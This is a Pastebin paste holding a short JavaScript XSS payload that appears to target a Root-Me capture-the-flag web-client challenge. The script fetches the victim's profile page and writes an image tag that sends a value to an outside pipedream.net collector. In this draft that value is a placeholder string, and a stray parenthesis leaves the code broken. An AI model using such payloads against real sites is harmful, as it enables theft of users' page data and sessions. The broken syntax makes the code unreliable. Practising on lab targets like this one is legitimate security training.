Advertisement
Guest User

Untitled

a guest
Jan 26th, 2020
95
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.28 KB | None | 0 0
  1. <script>
  2. $.get("http://challenge01.root-me.org/web-client/ch22/?action=profile", function( data ){
  3. var res = "hello"
  4. // $( ".result" ).html( data );
  5. res = "Load was performed." );
  6. document.write("<img src='https://en7yp7za2vjx.x.pipedream.net/"+res+"'>")
  7. });
  8. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement